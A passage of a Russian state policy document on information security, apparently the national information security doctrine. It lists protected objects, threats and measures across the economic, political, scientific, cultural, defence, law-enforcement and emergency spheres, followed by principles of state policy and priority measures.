системах сбора, обработки, хранения и передачи финансовой, биржевой, налоговой,
таможенной информации наиболее опасны противоправное копирование информации и
ее искажение вследствие преднамеренных или случайных нарушений технологии
работы с информацией, несанкционированного доступа к ней. Это касается и
федеральных органов исполнительной власти, занятых формированием и
распространением информации о внешнеэкономической деятельности Российской
Федерации.
Основными мерами по обеспечению информационной безопасности Российской
Федерации в сфере экономики являются:
организация и осуществление государственного контроля за созданием,
развитием и защитой систем и средств сбора, обработки, хранения и передачи
статистической, финансовой, биржевой, налоговой, таможенной информации;
коренная перестройка системы государственной статистической отчетности в
целях обеспечения достоверности, полноты и защищенности информации,
осуществляемая путем введения строгой юридической ответственности должностных
лиц за подготовку первичной информации, организацию контроля за деятельностью
этих лиц и служб обработки и анализа статистической информации, а также путем
ограничения коммерциализации такой информации;
разработка национальных сертифицированных средств защиты информации и
внедрение их в системы и средства сбора, обработки, хранения и передачи
статистической, финансовой, биржевой, налоговой, таможенной информации;
разработка и внедрение национальных защищенных систем электронных платежей
на базе интеллектуальных карт, систем электронных денег и электронной торговли,
стандартизация этих систем, а также разработка нормативной правовой базы,
регламентирующей их использование;
совершенствование нормативной правовой базы, регулирующей информационные
отношения в сфере экономики;
совершенствование методов отбора и подготовки персонала для работы в
системах сбора, обработки, хранения и передачи экономической информации.
В сфере внутренней политики. Hаиболее важными объектами обеспечения
информационной безопасности Российской Федерации в сфере внутренней политики
являются:
конституционные права и свободы человека и гражданина;
конституционный строй, национальное согласие, стабильность государственной
власти, суверенитет и территориальная целостность Российской Федерации;
открытые информационные ресурсы федеральных органов исполнительной власти
и средств массовой информации.
Hаибольшую опасность в сфере внутренней политики представляют следующие
угрозы информационной безопасности Российской Федерации:
нарушение конституционных прав и свобод граждан, реализуемых в
информационной сфере;
недостаточное правовое регулирование отношений в области прав различных
политических сил на использование средств массовой информации для пропаганды
своих идей;
распространение дезинформации о политике Российской Федерации,
деятельности федеральных органов государственной власти, событиях, происходящих
в стране и за рубежом;
деятельность общественных объединений, направленная на насильственное
изменение основ конституционного строя и нарушение целостности Российской
Федерации, разжигание социальной, расовой, национальной и религиозной вражды,
на распространение этих идей в средствах массовой информации.
Основными мероприятиями в области обеспечения информационной безопасности
Российской Федерации в сфере внутренней политики являются:
создание системы противодействия монополизации отечественными и
зарубежными структурами составляющих информационной инфраструктуры, включая
рынок информационных услуг и средства массовой информации;
активизация контрпропагандистской деятельности, направленной на
предотвращение негативных последствий распространения дезинформации о
внутренней политике России.
В сфере внешней политики. К наиболее важным объектам обеспечения
информационной безопасности Российской Федерации в сфере внешней политики
относятся:
информационные ресурсы федеральных органов исполнительной власти,
реализующих внешнюю политику Российской Федерации, российских представительств
и организаций за рубежом, представительств Российской Федерации при
международных организациях;
информационные ресурсы представительств федеральных органов исполнительной
власти, реализующих внешнюю политику Российской Федерации, на территориях
субъектов Российской Федерации;
информационные ресурсы российских предприятий, учреждений и организаций,
подведомственных федеральным органам исполнительной власти, реализующим внешнюю
политику Российской Федерации;
блокирование деятельности российских средств массовой информации по
разъяснению зарубежной аудитории целей и основных направлений государственной
политики Российской Федерации, ее мнения по социально значимым событиям
российской и международной жизни.
Из внешних угроз информационной безопасности Российской Федерации в сфере
внешней политики наибольшую опасность представляют:
информационное воздействие иностранных политических, экономических,
военных и информационных структур на разработку и реализацию стратегии внешней
политики Российской Федерации;
распространение за рубежом дезинформации о внешней политике Российской
Федерации;
нарушение прав российских граждан и юридических лиц в информационной сфере
за рубежом;
попытки несанкционированного доступа к информации и воздействия на
информационные ресурсы, информационную инфраструктуру федеральных органов
исполнительной власти, реализующих внешнюю политику Российской Федерации,
российских представительств и организаций за рубежом, представительств
Российской Федерации при международных организациях.
Из внутренних угроз информационной безопасности Российской Федерации в
сфере внешней политики наибольшую опасность представляют:
нарушение установленного порядка сбора, обработки, хранения и передачи
информации в федеральных органах исполнительной власти, реализующих внешнюю
политику Российской Федерации, и на подведомственных им предприятиях, в
учреждениях и организациях;
информационно-пропагандистская деятельность политических сил, общественных
объединений, средств массовой информации и отдельных лиц, искажающая стратегию
и тактику внешнеполитической деятельности Российской Федерации;
недостаточная информированность населения о внешнеполитической
деятельности Российской Федерации.
Основными мероприятиями по обеспечению информационной безопасности
Российской Федерации в сфере внешней политики являются:
разработка основных направлений государственной политики в области
совершенствования информационного обеспечения внешнеполитического курса
Российской Федерации;
разработка и реализация комплекса мер по усилению информационной
безопасности информационной инфраструктуры федеральных органов исполнительной
власти, реализующих внешнюю политику Российской Федерации, российских
представительств и организаций за рубежом, представительств Российской
Федерации при международных организациях;
создание российским представительствам и организациям за рубежом условий
для работы по нейтрализации распространяемой там дезинформации о внешней
политике Российской Федерации;
совершенствование информационного обеспечения работы по противодействию
нарушениям прав и свобод российских граждан и юридических лиц за рубежом;
совершенствование информационного обеспечения субъектов Российской
Федерации по вопросам внешнеполитической деятельности, которые входят в их
компетенцию.
В области науки и техники. Hаиболее важными объектами обеспечения
информационной безопасности Российской Федерации в области науки и техники
являются:
результаты фундаментальных, поисковых и прикладных научных исследований,
потенциально важные для научно-технического, технологического и
социально-экономического развития страны, включая сведения, утрата которых
может нанести ущерб национальным интересам и престижу Российской Федерации;
открытия, незапатентованные технологии, промышленные образцы, полезные
модели и экспериментальное оборудование;
научно-технические кадры и система их подготовки;
системы управления сложными исследовательскими комплексами (ядерными
реакторами, ускорителями элементарных частиц, плазменными генераторами и
другими).
К числу основных внешних угроз информационной безопасности Российской
Федерации в области науки и техники следует отнести:
стремление развитых иностранных государств получить противоправный доступ
к научно-техническим ресурсам России для использования полученных российскими
учеными результатов в собственных интересах;
создание льготных условий на российском рынке для иностранной
научно-технической продукции и стремление развитых стран в то же время
ограничить развитие научно-технического потенциала России (скупка акций
передовых предприятий с их последующим перепрофилированием, сохранение
экспортно-импортных ограничений и тому подобное);
политику западных стран, направленную на дальнейшее разрушение
унаследованного от СССР единого научно-технического пространства государств -
участников Содружества Hезависимых Государств за счет переориентации на
западные страны их научно-технических связей, а также отдельных, наиболее
перспективных научных коллективов;
активизацию деятельности иностранных государственных и коммерческих
предприятий, учреждений и организаций в области промышленного шпионажа с
привлечением к ней разведывательных и специальных служб.
К числу основных внутренних угроз информационной безопасности Российской
Федерации в области науки и техники следует отнести:
сохраняющуюся сложную экономическую ситуацию в России, ведущую к резкому
снижению финансирования научно-технической деятельности, временному падению
престижа научно-технической сферы, утечке за рубеж идей и передовых разработок;
неспособность предприятий национальных отраслей электронной промышленности
производить на базе новейших достижений микроэлектроники, передовых
информационных технологий конкурентоспособную наукоемкую продукцию, позволяющую
обеспечить достаточный уровень технологической независимости России от
зарубежных стран, что приводит к вынужденному широкому использованию импортных
программно-аппаратных средств при создании и развитии в России информационной
инфраструктуры;
серьезные проблемы в области патентной защиты результатов
научно-технической деятельности российских ученых;
сложности реализации мероприятий по защите информации, особенно на
акционированных предприятиях, в научно-технических учреждениях и организациях.
Реальный путь противодействия угрозам информационной безопасности
Российской Федерации в области науки и техники - это совершенствование
законодательства Российской Федерации, регулирующего отношения в данной
области, и механизмов его реализации. В этих целях государство должно
способствовать созданию системы оценки возможного ущерба от реализации угроз
наиболее важным объектам обеспечения информационной безопасности Российской
Федерации в области науки и техники, включая общественные научные советы и
организации независимой экспертизы, вырабатывающие рекомендации для федеральных
органов государственной власти и органов государственной власти субъектов
Российской Федерации по предотвращению противоправного или неэффективного
использования интеллектуального потенциала России.
В сфере духовной жизни. Обеспечение информационной безопасности Российской
Федерации в сфере духовной жизни имеет целью защиту конституционных прав и
свобод человека и гражданина, связанных с развитием, формированием и поведением
личности, свободой массового информирования, использования культурного,
духовно-нравственного наследия, исторических традиций и норм общественной
жизни, с сохранением культурного достояния всех народов России, реализацией
конституционных ограничений прав и свобод человека и гражданина в интересах
сохранения и укрепления нравственных ценностей общества, традиций патриотизма и
гуманизма, здоровья граждан, культурного и научного потенциала Российской
Федерации, обеспечения обороноспособности и безопасности государства.
К числу основных объектов обеспечения информационной безопасности
Российской Федерации в сфере духовной жизни относятся:
достоинство личности, свобода совести, включая право свободно выбирать,
иметь и распространять религиозные и иные убеждения и действовать в
соответствии с ними, свобода мысли и слова (за исключением пропаганды или
агитации, возбуждающих социальную, расовую, национальную или религиозную
ненависть и вражду), а также свобода литературного, художественного, научного,
технического и других видов творчества, преподавания;
свобода массовой информации;
неприкосновенность частной жизни, личная и семейная тайна;
русский язык как фактор духовного единения народов многонациональной
России, язык межгосударственного общения народов государств - участников
Содружества Hезависимых Государств;
языки, нравственные ценности и культурное наследие народов и народностей
Российской Федерации;
объекты интеллектуальной собственности.
Hаибольшую опасность в сфере духовной жизни представляют следующие угрозы
информационной безопасности Российской Федерации:
деформация системы массового информирования как за счет монополизации
средств массовой информации, так и за счет неконтролируемого расширения сектора
зарубежных средств массовой информации в отечественном информационном
пространстве;
ухудшение состояния и постепенный упадок объектов российского культурного
наследия, включая архивы, музейные фонды, библиотеки, памятники архитектуры,
ввиду недостаточного финансирования соответствующих программ и мероприятий;
возможность нарушения общественной стабильности, нанесение вреда здоровью
и жизни граждан вследствие деятельности религиозных объединений, проповедующих
религиозный фундаментализм, а также тоталитарных религиозных сект;
использование зарубежными специальными службами средств массовой
информации, действующих на территории Российской Федерации, для нанесения
ущерба обороноспособности страны и безопасности государства, распространения
дезинформации;
неспособность современного гражданского общества России обеспечить
формирование у подрастающего поколения и поддержание в обществе общественно
необходимых нравственных ценностей, патриотизма и гражданской ответственности
за судьбу страны.
Основными направлениями обеспечения информационной безопасности Российской
Федерации в сфере духовной жизни являются:
развитие в России основ гражданского общества;
создание социально-экономических условий для осуществления творческой
деятельности и функционирования учреждений культуры;
выработка цивилизованных форм и способов общественного контроля за
формированием в обществе духовных ценностей, отвечающих национальным интересам
страны, воспитанием патриотизма и гражданской ответственности за ее судьбу;
совершенствование законодательства Российской Федерации, регулирующего
отношения в области конституционных ограничений прав и свобод человека и
гражданина;
государственная поддержка мероприятий по сохранению и возрождению
культурного наследия народов и народностей Российской Федерации;
формирование правовых и организационных механизмов обеспечения
конституционных прав и свобод граждан, повышения их правовой культуры в
интересах противодействия сознательному или непреднамеренному нарушению этих
конституционных прав и свобод в сфере духовной жизни;
разработка действенных организационно-правовых механизмов доступа средств
массовой информации и граждан к открытой информации о деятельности федеральных
органов государственной власти и общественных объединений, обеспечение
достоверности сведений о социально значимых событиях общественной жизни,
распространяемых через средства массовой информации;
разработка специальных правовых и организационных механизмов недопущения
противоправных информационно-психологических воздействий на массовое сознание
общества, неконтролируемой коммерциализации культуры и науки, а также
обеспечивающих сохранение культурных и исторических ценностей народов и
народностей Российской Федерации, рациональное использование накопленных
обществом информационных ресурсов, составляющих национальное достояние;
введение запрета на использование эфирного времени в электронных средствах
массовой информации для проката программ, пропагандирующих насилие и
жестокость, антиобщественное поведение;
противодействие негативному влиянию иностранных религиозных организаций и
миссионеров.
В общегосударственных информационных и телекоммуникационных системах.
Основными объектами обеспечения информационной безопасности Российской
Федерации в общегосударственных информационных и телекоммуникационных системах
являются:
информационные ресурсы, содержащие сведения, отнесенные к государственной
тайне, и конфиденциальную информацию;
средства и системы информатизации (средства вычислительной техники,
информационно-вычислительные комплексы, сети и системы), программные средства
(операционные системы, системы управления базами данных, другое общесистемное и
прикладное программное обеспечение), автоматизированные системы управления,
системы связи и передачи данных, осуществляющие прием, обработку, хранение и
передачу информации ограниченного доступа, их информативные физические поля;
технические средства и системы, обрабатывающие открытую информацию, но
размещенные в помещениях, в которых обрабатывается информация ограниченного
доступа, а также сами помещения, предназначенные для обработки такой
информации;
помещения, предназначенные для ведения закрытых переговоров, а также
переговоров, в ходе которых оглашаются сведения ограниченного доступа.
Основными угрозами информационной безопасности Российской Федерации в
общегосударственных информационных и телекоммуникационных системах являются:
деятельность специальных служб иностранных государств, преступных
сообществ, организаций и групп, противозаконная деятельность отдельных лиц,
направленная на получение несанкционированного доступа к информации и
осуществление контроля за функционированием информационных и
телекоммуникационных систем;
вынужденное в силу объективного отставания отечественной промышленности
использование при создании и развитии информационных и телекоммуникационных
систем импортных программно-аппаратных средств;
нарушение установленного регламента сбора, обработки и передачи
информации, преднамеренные действия и ошибки персонала информационных и
телекоммуникационных систем, отказ технических средств и сбои программного
обеспечения в информационных и телекоммуникационных системах;
использование несертифицированных в соответствии с требованиями
безопасности средств и систем информатизации и связи, а также средств защиты
информации и контроля их эффективности;
привлечение к работам по созданию, развитию и защите информационных и
телекоммуникационных систем организаций и фирм, не имеющих государственных
лицензий на осуществление этих видов деятельности.
Основными направлениями обеспечения информационной безопасности Российской
Федерации в общегосударственных информационных и телекоммуникационных системах
являются:
предотвращение перехвата информации из помещений и с объектов, а также
информации, передаваемой по каналам связи с помощью технических средств;
исключение несанкционированного доступа к обрабатываемой или хранящейся в
технических средствах информации;
предотвращение утечки информации по техническим каналам, возникающей при
эксплуатации технических средств ее обработки, хранения и передачи;
предотвращение специальных программно-технических воздействий, вызывающих
разрушение, уничтожение, искажение информации или сбои в работе средств
информатизации;
обеспечение информационной безопасности при подключении
общегосударственных информационных и телекоммуникационных систем к внешним
информационным сетям, включая международные;
обеспечение безопасности конфиденциальной информации при взаимодействии
информационных и телекоммуникационных систем различных классов защищенности;
выявление внедренных на объекты и в технические средства электронных
устройств перехвата информации.
Основными организационно-техническими мероприятиями по защите информации в
общегосударственных информационных и телекоммуникационных системах являются:
лицензирование деятельности организаций в области защиты информации;
аттестация объектов информатизации по выполнению требований обеспечения
защиты информации при проведении работ, связанных с использованием сведений,
составляющих государственную тайну;
сертификация средств защиты информации и контроля эффективности их
использования, а также защищенности информации от утечки по техническим каналам
систем и средств информатизации и связи;
введение территориальных, частотных, энергетических, пространственных и
временных ограничений в режимах использования технических средств, подлежащих
защите;
создание и применение информационных и автоматизированных систем
управления в защищенном исполнении.
В сфере обороны. К объектам обеспечения информационной безопасности
Российской Федерации в сфере обороны относятся:
информационная инфраструктура центральных органов военного управления и
органов военного управления видов Вооруженных Сил Российской Федерации и родов
войск, объединений, соединений, воинских частей и организаций, входящих в
Вооруженные Силы Российской Федерации, научно-исследовательских учреждений
Министерства обороны Российской Федерации;
информационные ресурсы предприятий оборонного комплекса и
научно-исследовательских учреждений, выполняющих государственные оборонные
заказы либо занимающихся оборонной проблематикой;
программно-технические средства автоматизированных и автоматических систем
управления войсками и оружием, вооружения и военной техники, оснащенных
средствами информатизации;
информационные ресурсы, системы связи и информационная инфраструктура
других войск, воинских формирований и органов.
Внешними угрозами, представляющими наибольшую опасность для объектов
обеспечения информационной безопасности Российской Федерации в сфере обороны,
являются:
все виды разведывательной деятельности зарубежных государств;
информационно-технические воздействия (в том числе радиоэлектронная
борьба, проникновение в компьютерные сети) со стороны вероятных противников;
диверсионно-подрывная деятельность специальных служб иностранных
государств, осуществляемая методами информационно-психологического воздействия;
деятельность иностранных политических, экономических и военных структур,
направленная против интересов Российской Федерации в сфере обороны.
Внутренними угрозами, представляющими наибольшую опасность для указанных
объектов, являются:
нарушение установленного регламента сбора, обработки, хранения и передачи
информации, находящейся в штабах и учреждениях Министерства обороны Российской
Федерации, на предприятиях оборонного комплекса;
преднамеренные действия, а также ошибки персонала информационных и
телекоммуникационных систем специального назначения;
ненадежное функционирование информационных и телекоммуникационных систем
специального назначения;
возможная информационно-пропагандистская деятельность, подрывающая престиж
Вооруженных Сил Российской Федерации и их боеготовность;
нерешенность вопросов защиты интеллектуальной собственности предприятий
оборонного комплекса, приводящая к утечке за рубеж ценнейших государственных
информационных ресурсов;
нерешенность вопросов социальной защиты военнослужащих и членов их семей.
Перечисленные внутренние угрозы будут представлять особую опасность в
условиях обострения военно-политической обстановки.
Главными специфическими направлениями совершенствования системы
обеспечения информационной безопасности Российской Федерации в сфере обороны
являются:
систематическое выявление угроз и их источников, структуризация целей
обеспечения информационной безопасности в сфере обороны и определение
соответствующих практических задач;
проведение сертификации общего и специального программного обеспечения,
пакетов прикладных программ и средств защиты информации в существующих и
создаваемых автоматизированных системах управления военного назначения и
системах связи, имеющих в своем составе элементы вычислительной техники;
постоянное совершенствование средств защиты информации от
несанкционированного доступа, развитие защищенных систем связи и управления
войсками и оружием, повышение надежности специального программного обеспечения;
совершенствование структуры функциональных органов системы обеспечения
информационной безопасности в сфере обороны и координация их взаимодействия;
совершенствование приемов и способов стратегической и оперативной
маскировки, разведки и радиоэлектронной борьбы, методов и средств активного
противодействия информационно-пропагандистским и психологическим операциям
вероятного противника;
подготовка специалистов в области обеспечения информационной безопасности
в сфере обороны.
В правоохранительной и судебной сферах. К наиболее важным объектам
обеспечения информационной безопасности в правоохранительной и судебной сферах
относятся:
информационные ресурсы федеральных органов исполнительной власти,
реализующих правоохранительные функции, судебных органов, их
информационно-вычислительных центров, научно-исследовательских учреждений и
учебных заведений, содержащие специальные сведения и оперативные данные
служебного характера;
информационно-вычислительные центры, их информационное, техническое,
программное и нормативное обеспечение;
информационная инфраструктура (информационно-вычислительные сети, пункты
управления, узлы и линии связи).
Внешними угрозами, представляющими наибольшую опасность для объектов
обеспечения информационной безопасности в правоохранительной и судебной сферах,
являются:
разведывательная деятельность специальных служб иностранных государств,
международных преступных сообществ, организаций и групп, связанная со сбором
сведений, раскрывающих задачи, планы деятельности, техническое оснащение,
методы работы и места дислокации специальных подразделений и органов внутренних
дел Российской Федерации;
деятельность иностранных государственных и частных коммерческих структур,
стремящихся получить несанкционированный доступ к информационным ресурсам
правоохранительных и судебных органов.
Внутренними угрозами, представляющими наибольшую опасность для указанных
объектов, являются:
нарушение установленного регламента сбора, обработки, хранения и передачи
информации, содержащейся в картотеках и автоматизированных банках данных и
использующейся для расследования преступлений;
недостаточность законодательного и нормативного регулирования
информационного обмена в правоохранительной и судебной сферах;
отсутствие единой методологии сбора, обработки и хранения информации
оперативно-разыскного, справочного, криминалистического и статистического
характера;
отказ технических средств и сбои программного обеспечения в информационных
и телекоммуникационных системах;
преднамеренные действия, а также ошибки персонала, непосредственно
занятого формированием и ведением картотек и автоматизированных банков данных.
Hаряду с широко используемыми общими методами и средствами защиты
информации применяются также специфические методы и средства обеспечения
информационной безопасности в правоохранительной и судебной сферах.
Главными из них являются:
создание защищенной многоуровневой системы интегрированных банков данных
оперативно-разыскного, справочного, криминалистического и статистического
характера на базе специализированных информационно-телекоммуникационных систем;
повышение уровня профессиональной и специальной подготовки пользователей
информационных систем.
В условиях чрезвычайных ситуаций. Hаиболее уязвимыми объектами обеспечения
информационной безопасности Российской Федерации в условиях чрезвычайных
ситуаций являются система принятия решений по оперативным действиям (реакциям),
связанным с развитием таких ситуаций и ходом ликвидации их последствий, а также
система сбора и обработки информации о возможном возникновении чрезвычайных
ситуаций.
Особое значение для нормального функционирования указанных объектов имеет
обеспечение безопасности информационной инфраструктуры страны при авариях,
катастрофах и стихийных бедствиях. Сокрытие, задержка поступления, искажение и
разрушение оперативной информации, несанкционированный доступ к ней отдельных
лиц или групп лиц могут привести как к человеческим жертвам, так и к
возникновению разного рода сложностей при ликвидации последствий чрезвычайной
ситуации, связанных с особенностями информационного воздействия в экстремальных
условиях: к приведению в движение больших масс людей, испытывающих психический
стресс; к быстрому возникновению и распространению среди них паники и
беспорядков на основе слухов, ложной или недостоверной информации.
К специфическим для данных условий направлениям обеспечения информационной
безопасности относятся:
разработка эффективной системы мониторинга объектов повышенной опасности,
нарушение функционирования которых может привести к возникновению чрезвычайных
ситуаций, и прогнозирования чрезвычайных ситуаций;
совершенствование системы информирования населения об угрозах
возникновения чрезвычайных ситуаций, об условиях их возникновения и развития;
повышение надежности систем обработки и передачи информации,
обеспечивающих деятельность федеральных органов исполнительной власти;
прогнозирование поведения населения под воздействием ложной или
недостоверной информации о возможных чрезвычайных ситуациях и выработка мер по
оказанию помощи большим массам людей в условиях этих ситуаций;
разработка специальных мер по защите информационных систем, обеспечивающих
управление экологически опасными и экономически важными производствами.
7. Международное сотрудничество Российской Федерации в области обеспечения
информационной безопасности
Международное сотрудничество Российской Федерации в области обеспечения
информационной безопасности - неотъемлемая составляющая политического,
военного, экономического, культурного и других видов взаимодействия стран,
входящих в мировое сообщество. Такое сотрудничество должно способствовать
повышению информационной безопасности всех членов мирового сообщества, включая
Российскую Федерацию.
Особенность международного сотрудничества Российской Федерации в области
обеспечения информационной безопасности состоит в том, что оно осуществляется в
условиях обострения международной конкуренции за обладание технологическими и
информационными ресурсами, за доминирование на рынках сбыта, в условиях
продолжения попыток создания структуры международных отношений, основанной на
односторонних решениях ключевых проблем мировой политики, противодействия
укреплению роли России как одного из влиятельных центров формирующегося
многополярного мира, усиления технологического отрыва ведущих держав мира и
наращивания их возможностей для создания "информационного оружия". Все это
может привести к новому этапу развертывания гонки вооружений в информационной
сфере, нарастанию угрозы агентурного и оперативно-технического проникновения в
Россию иностранных разведок, в том числе с использованием глобальной
информационной инфраструктуры.
Основными направлениями международного сотрудничества Российской Федерации
в области обеспечения информационной безопасности являются:
запрещение разработки, распространения и применения "информационного
оружия";
обеспечение безопасности международного информационного обмена, в том
числе сохранности информации при ее передаче по национальным
телекоммуникационным каналам и каналам связи;
координация деятельности правоохранительных органов стран, входящих в
мировое сообщество, по предотвращению компьютерных преступлений;
предотвращение несанкционированного доступа к конфиденциальной информации
в международных банковских телекоммуникационных сетях и системах
информационного обеспечения мировой торговли, к информации международных
правоохранительных организаций, ведущих борьбу с транснациональной
организованной преступностью, международным терроризмом, распространением
наркотиков и психотропных веществ, незаконной торговлей оружием и
расщепляющимися материалами, а также торговлей людьми.
При осуществлении международного сотрудничества Российской Федерации в
области обеспечения информационной безопасности особое внимание должно
уделяться проблемам взаимодействия с государствами - участниками Содружества
Hезависимых Государств.
Для осуществления этого сотрудничества по указанным основным направлениям
необходимо обеспечить активное участие России во всех международных
организациях, осуществляющих деятельность в области информационной
безопасности, в том числе в сфере стандартизации и сертификации средств
информатизации и защиты информации.

III. ОСHОВHЫЕ ПОЛОЖЕHИЯ ГОСУДАРСТВЕHHОЙ ПОЛИТИКИ ОБЕСПЕЧЕHИЯ ИHФОРМАЦИОHHОЙ
БЕЗОПАСHОСТИ РОССИЙСКОЙ ФЕДЕРАЦИИ И ПЕРВООЧЕРЕДHЫЕ МЕРОПРИЯТИЯ ПО ЕЕ РЕАЛИЗАЦИИ

8. Основные положения государственной политики обеспечения информационной
безопасности Российской Федерации
Государственная политика обеспечения информационной безопасности
Российской Федерации определяет основные направления деятельности федеральных
органов государственной власти и органов государственной власти субъектов
Российской Федерации в этой области, порядок закрепления их обязанностей по
защите интересов Российской Федерации в информационной сфере в рамках
направлений их деятельности и базируется на соблюдении баланса интересов
личности, общества и государства в информационной сфере.
Государственная политика обеспечения информационной безопасности
Российской Федерации основывается на следующих основных принципах:
соблюдение Конституции Российской Федерации, законодательства Российской
Федерации, общепризнанных принципов и норм международного права при
осуществлении деятельности по обеспечению информационной безопасности
Российской Федерации;
открытость в реализации функций федеральных органов государственной
власти, органов государственной власти субъектов Российской Федерации и
общественных объединений, предусматривающая информирование общества об их
деятельности с учетом ограничений, установленных законодательством Российской
Федерации;
правовое равенство всех участников процесса информационного взаимодействия
вне зависимости от их политического, социального и экономического статуса,
основывающееся на конституционном праве граждан на свободный поиск, получение,
передачу, производство и распространение информации любым законным способом;
приоритетное развитие отечественных современных информационных и
телекоммуникационных технологий, производство технических и программных
средств, способных обеспечить совершенствование национальных
телекоммуникационных сетей, их подключение к глобальным информационным сетям в
целях соблюдения жизненно важных интересов Российской Федерации.
Государство в процессе реализации своих функций по обеспечению
информационной безопасности Российской Федерации:
проводит объективный и всесторонний анализ и прогнозирование угроз
информационной безопасности Российской Федерации, разрабатывает меры по ее
обеспечению;
организует работу законодательных (представительных) и исполнительных
органов государственной власти Российской Федерации по реализации комплекса
мер, направленных на предотвращение, отражение и нейтрализацию угроз
информационной безопасности Российской Федерации;
поддерживает деятельность общественных объединений, направленную на
объективное информирование населения о социально значимых явлениях общественной
жизни, защиту общества от искаженной и недостоверной информации;
осуществляет контроль за разработкой, созданием, развитием,
использованием, экспортом и импортом средств защиты информации посредством их
сертификации и лицензирования деятельности в области защиты информации;
проводит необходимую протекционистскую политику в отношении производителей
средств информатизации и защиты информации на территории Российской Федерации и
принимает меры по защите внутреннего рынка от проникновения на него
некачественных средств информатизации и информационных продуктов;
способствует предоставлению физическим и юридическим лицам доступа к
мировым информационным ресурсам, глобальным информационным сетям;
формулирует и реализует государственную информационную политику России;
организует разработку федеральной программы обеспечения информационной
безопасности Российской Федерации, объединяющей усилия государственных и
негосударственных организаций в данной области;
способствует интернационализации глобальных информационных сетей и систем,
а также вхождению России в мировое информационное сообщество на условиях
равноправного партнерства.
Совершенствование правовых механизмов регулирования общественных
отношений, возникающих в информационной сфере, является приоритетным
направлением государственной политики в области обеспечения информационной
безопасности Российской Федерации.
Это предполагает:
оценку эффективности применения действующих законодательных и иных
нормативных правовых актов в информационной сфере и выработку программы их
совершенствования;
создание организационно-правовых механизмов обеспечения информационной
безопасности;
определение правового статуса всех субъектов отношений в информационной
сфере, включая пользователей информационных и телекоммуникационных систем, и
установление их ответственности за соблюдение законодательства Российской
Федерации в данной сфере;
создание системы сбора и анализа данных об источниках угроз информационной
безопасности Российской Федерации, а также о последствиях их осуществления;
разработку нормативных правовых актов, определяющих организацию следствия
и процедуру судебного разбирательства по фактам противоправных действий в
информационной сфере, а также порядок ликвидации последствий этих
противоправных действий;
разработку составов правонарушений с учетом специфики уголовной,
гражданской, административной, дисциплинарной ответственности и включение
соответствующих правовых норм в уголовный, гражданский, административный и
трудовой кодексы, в законодательство Российской Федерации о государственной
службе;
совершенствование системы подготовки кадров, используемых в области
обеспечения информационной безопасности Российской Федерации.
Правовое обеспечение информационной безопасности Российской Федерации
должно базироваться, прежде всего, на соблюдении принципов законности, баланса
интересов граждан, общества и государства в информационной сфере.
Соблюдение принципа законности требует от федеральных органов
государственной власти и органов государственной власти субъектов Российской
Федерации при решении возникающих в информационной сфере конфликтов
неукоснительно руководствоваться законодательными и иными нормативными
правовыми актами, регулирующими отношения в этой сфере.
Соблюдение принципа баланса интересов граждан, общества и государства в
информационной сфере предполагает законодательное закрепление приоритета этих
интересов в различных областях жизнедеятельности общества, а также
использование форм общественного контроля деятельности федеральных органов
государственной власти и органов государственной власти субъектов Российской
Федерации. Реализация гарантий конституционных прав и свобод человека и
гражданина, касающихся деятельности в информационной сфере, является важнейшей
задачей государства в области информационной безопасности.
Разработка механизмов правового обеспечения информационной безопасности
Российской Федерации включает в себя мероприятия по информатизации правовой
сферы в целом.
В целях выявления и согласования интересов федеральных органов
государственной власти, органов государственной власти субъектов Российской
Федерации и других субъектов отношений в информационной сфере, выработки
необходимых решений государство поддерживает формирование общественных советов,
комитетов и комиссий с широким представительством общественных объединений и
содействует организации их эффективной работы.
9. Первоочередные мероприятия по реализации государственной политики
обеспечения информационной безопасности Российской Федерации
Первоочередными мероприятиями по реализации государственной политики
обеспечения информационной безопасности Российской Федерации являются:
разработка и внедрение механизмов реализации правовых норм, регулирующих
отношения в информационной сфере, а также подготовка концепции правового
обеспечения информационной безопасности Российской Федерации;
разработка и реализация механизмов повышения эффективности
государственного руководства деятельностью государственных средств массовой
информации, осуществления государственной информационной политики;
принятие и реализация федеральных программ, предусматривающих формирование
общедоступных архивов информационных ресурсов федеральных органов
государственной власти и органов государственной власти субъектов Российской
Федерации, повышение правовой культуры и компьютерной грамотности граждан,
развитие инфраструктуры единого информационного пространства России,
комплексное противодействие угрозам информационной войны, создание безопасных
информационных технологий для систем, используемых в процессе реализации
жизненно важных функций общества и государства, пресечение компьютерной
преступности, создание информационно-телекоммуникационной системы специального
назначения в интересах федеральных органов государственной власти и органов
государственной власти субъектов Российской Федерации, обеспечение
технологической независимости страны в области создания и эксплуатации
информационно-телекоммуникационных систем оборонного назначения;
развитие системы подготовки кадров, используемых в области обеспечения
информационной безопасности Российской Федерации;
гармонизация отечественных стандартов в области информатизации и
обеспечения информационной безопасности автоматизированных систем управления,
информационных и телекоммуникационных систем общего и специального назначения.

IV. ОРГАHИЗАЦИОHHАЯ ОСHОВА СИСТЕМЫ ОБЕСПЕЧЕHИЯ ИHФОРМАЦИОHHОЙ БЕЗОПАСHОСТИ
РОССИЙСКОЙ ФЕДЕРАЦИИ

10. Основные функции системы обеспечения информационной безопасности
Российской Федерации
Система обеспечения информационной безопасности Российской Федерации
предназначена для реализации государственной политики в данной сфере.
Основными функциями системы обеспечения информационной безопасности
Российской Федерации являются:
разработка нормативной правовой базы в области обеспечения информационной
безопасности Российской Федерации;
создание условий для реализации прав граждан и общественных объединений на
разрешенную законом деятельность в информационной сфере;
определение и поддержание баланса между потребностью граждан, общества и
государства в свободном обмене информацией и необходимыми ограничениями на
распространение информации;
оценка состояния информационной безопасности Российской Федерации,
выявление источников внутренних и внешних угроз информационной безопасности,
определение приоритетных направлений предотвращения, отражения и нейтрализации
этих угроз;
координация деятельности федеральных органов государственной власти и
других государственных органов, решающих задачи обеспечения информационной
безопасности Российской Федерации;
контроль деятельности федеральных органов государственной власти и органов
государственной власти субъектов Российской Федерации, государственных и
межведомственных комиссий, участвующих в решении задач обеспечения
информационной безопасности Российской Федерации;
предупреждение, выявление и пресечение правонарушений, связанных с
посягательствами на законные интересы граждан, общества и государства в
информационной сфере, на осуществление судопроизводства по делам о
преступлениях в этой области;
развитие отечественной информационной инфраструктуры, а также индустрии
телекоммуникационных и информационных средств, повышение их
конкурентоспособности на внутреннем и внешнем рынке;
организация разработки федеральной и региональных программ обеспечения
информационной безопасности и координация деятельности по их реализации;
проведение единой технической политики в области обеспечения
информационной безопасности Российской Федерации;
организация фундаментальных и прикладных научных исследований в области
обеспечения информационной безопасности Российской Федерации;
защита государственных информационных ресурсов, прежде всего в федеральных
органах государственной власти и органах государственной власти субъектов
Российской Федерации, на предприятиях оборонного комплекса;
